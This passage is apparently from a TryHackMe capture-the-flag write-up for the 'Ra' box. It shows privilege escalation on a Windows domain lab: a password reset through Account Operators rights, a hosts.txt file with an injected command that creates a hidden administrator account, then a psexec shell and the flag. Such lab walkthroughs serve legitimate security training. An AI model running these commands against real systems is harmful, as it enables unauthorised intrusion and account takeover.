28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*Evil-WinRM* PS C:\users> whoami /all
USER INFORMATION
----------------
User Name SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We see that we are part of the Account Operators group that means we can modify all accounts except admin accounts. Then on checking different directories we find a scripts directory which has a checkservers.ps1 powershell script, which tells us that “C:\Users\brittanycr\hosts.txt” is being run/used automatically.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
*Evil-WinRM* PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 11/14/2020 10:14 AM 31 log.txt
*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 11/14/2020 10:15:03
*Evil-WinRM* PS C:\scripts> .\checkservers.ps1
11/14/2020 10:15:16 AM
Access is denied
At C:\scripts\checkservers.ps1:25 char:1
+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\Users\brittanycr\hosts.txt' because it does not exist.
At C:\scripts\checkservers.ps1:25 char:1
+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
Last run: 11/14/2020 10:15:17
Access to the path 'C:\scripts\log.txt' is denied.
At C:\scripts\checkservers.ps1:81 char:1
+ Set-Content -Path C:\scripts\log.txt -Value $log
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Set-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetContentCommand
Available count: 0
Not available count: 0
Not available hosts:
Sleeping 45 seconds
11/14/2020 10:16:02 AM
Since we are part of the Account Operators group let’s reset the password for the account “brittanycr”.
1
2
3
4
*Evil-WinRM* PS C:\scripts> net user brittanycr hello123#
The command completed successfully.
*Evil-WinRM* PS C:\scripts>
So now let’s access edit that hosts.txt file and create a new Admin user!
1
2
3
4
5
6
7
8
9
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u brittanycr -p 'hello123#'
SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.226.131 445 FIRE [+] windcorp.thm\brittanycr:hello123#
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec winrm windcorp.thm -u brittanycr -p 'hello123#'
WINRM 10.10.226.131 5985 FIRE [*] http://10.10.226.131:5985/wsman
WINRM 10.10.226.131 5985 FIRE [-] WINDCORP\brittanycr:hello123# "Failed to authenticate the user brittanycr with ntlm"
It seems we can’t psexec or winrm into the box as brittanycr. Let’s use smbclient to put our malicious hosts.txt file.
1
2
3
4
5
6
7
8
9
10
11
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbclient -U 'brittanycr' //windcorp.thm/Users
Enter WORKGROUP\brittanycr's password:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr\
smb: \brittanycr\> dir
. D 0 Sun May 3 05:06:46 2020
.. D 0 Sun May 3 05:06:46 2020
hosts.txt A 22 Sun May 3 19:14:57 2020
15587583 blocks of size 4096. 10891432 blocks available
Let’s make our malicious hosts.txt file:
1
net user sid hello!123 /add;net localgroup Administrators sid /add
Now let’s put it using smbclient.
1
2
3
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.2 kb/s) (average 0.2 kb/s)
smb: \brittanycr\> exit
Let’s verify if it worked, we can use crackmapexec for this.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u sid -p 'hello!123'
SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.226.131 445 FIRE [+] windcorp.thm\sid:hello!123 (Pwn3d!)
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py sid@windcorp.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on windcorp.thm.....
[*] Found writable share ADMIN$
[*] Uploading file cfKhdeUq.exe
[*] Opening SVCManager on windcorp.thm.....
[*] Creating service TNal on windcorp.thm.....
[*] Starting service TNal.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1158]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 84E1-0562
Directory of c:\Users\Administrator\Desktop
05/10/2020 03:17 AM <DIR> .
05/10/2020 03:17 AM <DIR> ..
05/07/2020 12:22 AM 47 Flag3.txt
1 File(s) 47 bytes
2 Dir(s) 44,605,804,544 bytes free
c:\Users\Administrator\Desktop>type "Flag3.txt"
THM{ba3a2bff2e******************************}
c:\Users\Administrator\Desktop>
And that was the box, hope you liked my writeup and learned something new :D